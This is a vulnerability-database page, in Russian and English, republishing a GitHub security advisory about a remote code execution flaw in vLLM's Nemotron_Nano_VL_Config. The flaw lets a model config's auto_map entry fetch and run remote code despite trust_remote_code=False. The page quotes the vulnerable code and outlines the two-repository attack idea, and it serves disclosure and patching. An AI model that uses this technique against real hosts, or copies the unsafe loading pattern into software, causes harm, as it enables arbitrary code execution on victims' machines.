Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-8fr4-5q9j-m8gm

Опубликовано: 02 дек. 2025
Источник: github
Github: Прошло ревью
CVSS3: 7.1

Описание

vLLM vulnerable to remote code execution via transformers_utils/get_config

Summary

vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.

Details

The vulnerable code resolves and instantiates classes from auto_map entries without checking whether those entries point to a different repo or whether remote code execution is allowed.

class Nemotron_Nano_VL_Config(PretrainedConfig): model_type = 'Llama_Nemotron_Nano_VL' def __init__(self, **kwargs): super().__init__(**kwargs) if vision_config is not None: assert "auto_map" in vision_config and "AutoConfig" in vision_config["auto_map"] # <-- vulnerable dynamic resolution + instantiation happens here vision_auto_config = get_class_from_dynamic_module(*vision_config["auto_map"]["AutoConfig"].split("--")[::-1]) self.vision_config = vision_auto_config(**vision_config) else: self.vision_config = PretrainedConfig()

get_class_from_dynamic_module(...) is capable of fetching and importing code from the Hugging Face repo specified in the mapping. trust_remote_code is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the trust_remote_code guard.

Impact

This is a critical vulnerability because it breaks the documented trust_remote_code safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses vllm’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.

Fixes

Пакеты

Наименование

vllm

pip
Затронутые версииВерсия исправления

< 0.11.1

0.11.1

EPSS

Процентиль: 39%
0.00176
Низкий

7.1 High

CVSS3

Дефекты

CWE-94

Связанные уязвимости

CVSS3: 7.1
nvd
2 месяца назад

vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.

CVSS3: 7.1
debian
2 месяца назад

vLLM is an inference and serving engine for large language models (LLM ...

EPSS

Процентиль: 39%
0.00176
Низкий

7.1 High

CVSS3

Дефекты

CWE-94